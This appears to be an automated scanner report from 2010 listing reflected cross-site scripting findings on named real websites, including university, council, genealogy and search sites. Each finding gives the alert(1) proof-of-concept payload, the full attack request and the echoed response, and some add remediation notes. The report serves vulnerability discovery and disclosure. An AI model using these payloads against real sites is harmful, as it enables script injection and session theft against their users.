HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:03 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=b09ee82c8db9984a2e68b89eb09cd729; expires=Wed, 12-Dec-2035 00:33:05 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76337
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 class="headline">Top World News69f36<img Src=a Onerror=alert(1)>041a23ee282 Blogs </h1> ...[SNIP]...
The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 839e3'%3balert(1)//d3646eb9450 was submitted in the eventid parameter. This input was echoed as 839e3';alert(1)//d3646eb9450 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/pmny001/viewer/index.jsp?eventid=34996839e3'%3balert(1)//d3646eb9450&adid=gcs_website HTTP/1.1 Host: video.webcasts.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:36:12 GMT Server: Apache/1.3.41 (Unix) mod_jk/1.2.26 mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.8e Vary: Accept-Encoding Set-Cookie: JSESSIONID=6816DE2CF65C0B298B29F9821D80EF00; Path=/ Content-Length: 344 Connection: close Content-Type: text/html;charset=utf-8
2.317. http://www.alumni.uga.edu/alumni/phpsearch/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.alumni.uga.edu
Path:
/alumni/phpsearch/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1a7"><script>alert(1)</script>e5bc102f42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /alumni/phpsearch/search.php/7c1a7"><script>alert(1)</script>e5bc102f42 HTTP/1.1 Host: www.alumni.uga.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:40:14 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.4-2ubuntu5.10 Connection: close Content-Type: text/html; charset=windows-1252 Content-Length: 15038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This is the search template file (search_template.html) which con ...[SNIP]... <form method="get" action="/alumni/phpsearch/search.php/7c1a7"><script>alert(1)</script>e5bc102f42" class="zoom_searchform"> ...[SNIP]...
The value of the rt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c239b"style%3d"x%3aexpression(alert(1))"d77fd4d7f9d was submitted in the rt parameter. This input was echoed as c239b"style="x:expression(alert(1))"d77fd4d7f9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search/rectype/default.aspx?rt=34/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dHrUDTavZK8SAlAej_KjFCQ\\x26amp;ved\\x3d0CE4Q6QUoAQ\\x26amp;q\\x3daspx+search+index\\x26amp;usg\\x3dAFQjCNFjK5ECYLcXMDBPeLrcEjoDeo01qA\\x22\\x3eBirth,c239b"style%3d"x%3aexpression(alert(1))"d77fd4d7f9d HTTP/1.1 Host: www.ancestry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 Set-Cookie: VARSESSION=S=BXWDg%2ftsz06iWV%2beg6PXLw%3d%3d&SLI=0&FIRSTSESSION=1&ITT=0&FSR.LC=1; domain=.ancestry.com; path=/ Set-Cookie: ANCUUID=ZAK0-_pUoIkpz4qedOWUC; domain=.ancestry.com; expires=Wed, 11-Dec-2030 18:39:44 GMT; path=/ Set-Cookie: ATT=0; domain=.ancestry.com; path=/ Set-Cookie: ANCATT=0; domain=.ancestry.com; path=/ Set-Cookie: SAC=; domain=.ancestry.com; expires=Tue, 11-Dec-1990 18:39:44 GMT; path=/ Set-Cookie: RMEATT=; domain=.ancestry.com; expires=Tue, 11-Dec-1990 18:39:44 GMT; path=/ Set-Cookie: VARS=MS=2; domain=.ancestry.com; expires=Wed, 11-Dec-2030 18:39:44 GMT; path=/ Set-Cookie: OMNITURET=MR=1033; domain=.ancestry.com; path=/ P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:39:47 GMT Connection: close Content-Length: 4888154 Vary: Accept-Encoding, User-Agent
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Search All Catego ...[SNIP]... 34/x26amp;rct\\x3dj\\x26amp;sa\\x3dx\\x26amp;ei\\x3dhrudtavzk8salaej_kjfcq\\x26amp;ved\\x3d0ce4q6quoaq\\x26amp;q\\x3daspx search index\\x26amp;usg\\x3dafqjcnfjk5ecylcxmdbpelrcejodeo01qa\\x22\\x3ebirth,c239b"style="x:expression(alert(1))"d77fd4d7f9d&lcid=1033&css=default&ti=0&ti.si=0&cs=http%3a%2f%2fc.mfcreative.com&ss=search.ancestry.com&gss=&view=advanced"> ...[SNIP]...
2.319. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.casey.vic.gov.au
Path:
/search/search.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f33b4--><script>alert(1)</script>2a2aa3f91db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/search.asp?f33b4--><script>alert(1)</script>2a2aa3f91db=1 HTTP/1.1 Host: www.casey.vic.gov.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 17:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 52853 Content-Type: text/html; Charset=iso-8859-1 Set-Cookie: cookieChecker=true; path=/ Set-Cookie: ASPSESSIONIDAAABSDTB=MFOODDMBBEJMFKINHKBJFFFB; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a onClick="javascript:pageTracker._trackPageview ('Switch to m.casey.vic.gov.au');" href="http://www.casey.vic.gov.au/search/search.asp?f33b4--><script>alert(1)</script>2a2aa3f91db=1&mobile=on"> ...[SNIP]...
2.320. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.casey.vic.gov.au
Path:
/search/search.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d70cc"><script>alert(1)</script>4f5fa439031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/search.asp?d70cc"><script>alert(1)</script>4f5fa439031=1 HTTP/1.1 Host: www.casey.vic.gov.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 17:48:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 52844 Content-Type: text/html; Charset=iso-8859-1 Set-Cookie: cookieChecker=true; path=/ Set-Cookie: ASPSESSIONIDAAABSDTB=JFOODDMBHLJEMFJPBMCOBMKO; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <meta name="DC.Identifier" content="http://www.casey.vic.gov.au/search/search.asp?d70cc"><script>alert(1)</script>4f5fa439031=1" /> ...[SNIP]...
2.321. http://www.coveo.com/en/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.coveo.com
Path:
/en/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a629"><script>alert(1)</script>bc38d626a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/search?6a629"><script>alert(1)</script>bc38d626a27=1 HTTP/1.1 Host: www.coveo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91313928.1292089160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; __utma=91313928.1486929676.1292089160.1292089160.1292089160.1; _mkto_trk=id:969-GCA-889&token:_mch-coveo.com-1292089161369-53429; __utmc=91313928; has_previous_visit=1; __utmb=91313928.5.10.1292089160; ASP.NET_SessionId=isybje553sfiy4jqmbj5ft2f;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> ...[SNIP]... <meta name="Identifier-URL" content="http://www.coveo.com/en/search?6a629"><script>alert(1)</script>bc38d626a27=1" /> ...[SNIP]...
2.322. http://www.coveo.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.coveo.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8578f"><script>alert(1)</script>82ac58553f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /search?8578f"><script>alert(1)</script>82ac58553f2=1 HTTP/1.1 Host: www.coveo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91313928.1292089160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; __utma=91313928.1486929676.1292089160.1292089160.1292089160.1; _mkto_trk=id:969-GCA-889&token:_mch-coveo.com-1292089161369-53429; __utmc=91313928; has_previous_visit=1; __utmb=91313928.5.10.1292089160; ASP.NET_SessionId=isybje553sfiy4jqmbj5ft2f;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> ...[SNIP]... <meta name="Identifier-URL" content="http://www.coveo.com/en/search?8578f"><script>alert(1)</script>82ac58553f2=1" /> ...[SNIP]...
2.323. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myspace.com
Path:
/search/people
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 701c5"><script>alert(1)</script>44281783f2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/people?q='&ac=t&701c5"><script>alert(1)</script>44281783f2c=1 HTTP/1.1 Host: www.myspace.com Proxy-Connection: keep-alive Referer: http://www.myspace.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SessionDDF2=mcPoHfIIV59hmX+Gr8H3JPSxp1HZEvXYSahxEX7GQkUMD09Q3vcrFIdoeR0Pzy5a9wGI/0duN+uC9ODLjsyYTw==; __utmz=102911388.1292087925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Login=MFoGCSsGAQQBgjdYA6BNMEsGCisGAQQBgjdYAwGgPTA7AgMCAAECAmYDAgIAwAQIWkzMjCdrUDAEEPZVe%2fg3Kd%2fUTyUmRaLx%2b24EEPaa%2fDq4UlMTSMkKrp3k3CA%3d; MSCulture=IP=174.121.222.18&IPCulture=en-US&PreferredCulture=en-US&Country=VVM%3D&ForcedExpiration=0&timeZone=-6&USRLOC=QXJlYUNvZGU9NzEzJkNpdHk9SG91c3RvbiZDb3VudHJ5Q29kZT1VUyZDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzJkRtYUNvZGU9NjE4JkxhdGl0dWRlPTI5Ljc1MjMmTG9uZ2l0dWRlPS05NS4zNjcmUG9zdGFsQ29kZT03NzAwMiZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA%3D%3D&UserFirstVisit=1; __utma=102911388.1756327293.1292087925.1292087925.1292087925.1; __utmb=102911388.0.10.1292087925; __utmc=102911388; NSC_mc_gvuvsb-hmpcbmtjuft_80=ffffffff0948066745525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Server: 540553926148ebf33c49209b6b904bb79eb3f3a8da5b3fb4 X-AspNet-Version: 4.0.30319 X-PoweredBy: The Force Date: Sat, 11 Dec 2010 17:23:42 GMT X-Vertical: searchrecommendations Content-Length: 76446
2.324. http://www.orange.md/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.orange.md
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8644b"><script>alert(1)</script>36a5e21bb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8644b"><script>alert(1)</script>36a5e21bb82=1 HTTP/1.1 Host: www.orange.md Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.325. http://www.recover.ie/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.recover.ie
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58f4"><script>alert(1)</script>470b0d79b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php/d58f4"><script>alert(1)</script>470b0d79b3 HTTP/1.1 Host: www.recover.ie Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Zeus/4.3 Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Date: Sat, 11 Dec 2010 17:46:07 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=329537be69319ae60d2d2eeb70f6b0fc; path=/ Set-Cookie: X-Mapping-enlokcai=B310AAFE3449B38CC4AA9A76F71ADC9B; path=/
<HTML> <HEAD> <TITLE>Schizophrenia Ireland Information Centre : Search</TITLE> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <script language="JavaScript"> <!-- function MM ...[SNIP]... <form name="search_form" method="get" action="/search.php/d58f4"><script>alert(1)</script>470b0d79b3" class="zoom_searchform"> ...[SNIP]...
2.326. http://www.uniquecarsandparts.com.au/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.uniquecarsandparts.com.au
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c6f"><script>alert(1)</script>0952caf40b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php/46c6f"><script>alert(1)</script>0952caf40b0 HTTP/1.1 Host: www.uniquecarsandparts.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 17:46:48 GMT Server: Apache/2.0.52 (CentOS) X-Powered-By: PHP/4.3.9 Vary: Accept-Encoding Content-Length: 5615 Connection: close Content-Type: text/html; charset=windows-1252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This is the search template file (search_template.html) which contai ...[SNIP]... <form method="get" action="/search.php/46c6f"><script>alert(1)</script>0952caf40b0" class="zoom_searchform"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9174b<a>0d9ccf1127b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search9174b<a>0d9ccf1127b/index.php HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6f87d--><script>alert(1)</script>256b0c90873 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search6f87d--><script>alert(1)</script>256b0c90873/index.php HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3357c"><script>alert(1)</script>18f1228fe6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search3357c"><script>alert(1)</script>18f1228fe6b/index.php HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
...[SNIP]... ef="mailto:?subject=News from the University System of Maryland&body=I thought you'd be interested in what's happening at the University System of Maryland. Read about it at: http://www.usmd.edu/search3357c"><script>alert(1)</script>18f1228fe6b/index.php" style="margin-right: 4em;" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd74d"><a>011ea280fa8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search/index.phpcd74d"><a>011ea280fa8 HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into an HTML comment. The payload dedea--><script>alert(1)</script>639d555af77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search/dedea--><script>alert(1)</script>639d555af77 HTTP/1.1 Host: www.usmd.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d80aa<a>537d86c3c97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /-/opensearch/extensions/1.0/ HTTP/1.1 Host: api.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d80aa<a>537d86c3c97
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca0fb'-alert(1)-'e32f2ad39fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /x22 HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ca0fb'-alert(1)-'e32f2ad39fa
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Dec 2010 18:02:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Expires: Sat, 11 Dec 2010 18:02:38 GMT Cache-Control: max-age=1 Content-Length: 5760
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,follow"><meta http-equiv="content-type" content="text/html; c ...[SNIP]... <script type="text/javascript">var fq,r1c,r2c,ric,rfq,rq,rds,rt,y,y1,ti,tig,ka,kb,kc,kd,ke,kf,kg,kh,ki,kj,kl,km,kn,ko,kp,kq,kr,ks,kt,ku,kv,kw,kx,ky,kz;fq=0;fd=1;it=1;r1hc=0;r1c=1;r2c=0;ric=3;rq='ca0fb'-alert(1)-'e32f2ad39fa';rfq=1;rt='';rv='';rad='';rds=10;rs=0;kl='';kp='';ks='';kw='';ka='';kt='';ky='';kk='';kf='';kc='';ke='';kr='';ko='';kj='';kz='';kg='';kh='';kd='';ki='';kn='';kb='';km='';ku='';kq='';kv='';kx='';</scri ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24663"><script>alert(1)</script>e8102939cab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /shareit/cart.html?productid=300057806¤cies=USD&js=0 HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000; Referer: http://www.google.com/search?hl=en&q=24663"><script>alert(1)</script>e8102939cab
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:17:41 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48169
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03)</title> <style type=" ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=24663"><script>alert(1)</script>e8102939cab" target="_self" > ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625fc"><script>alert(1)</script>75a59097467 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /shareit/cart.html HTTP/1.1 Host: secure.shareit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=838993162.20480.0000; Referer: http://www.google.com/search?hl=en&q=625fc"><script>alert(1)</script>75a59097467
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 17:48:09 GMT Server: Apache P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 9326
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>share*it! - A service of Digital River (DEF03)</title> <link rel="st ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=625fc"><script>alert(1)</script>75a59097467" target="_self" > ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c03b'style%3d'x%3aexpression(alert(1))'d7b136562ff was submitted in the Referer HTTP header. This input was echoed as 3c03b'style='x:expression(alert(1))'d7b136562ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
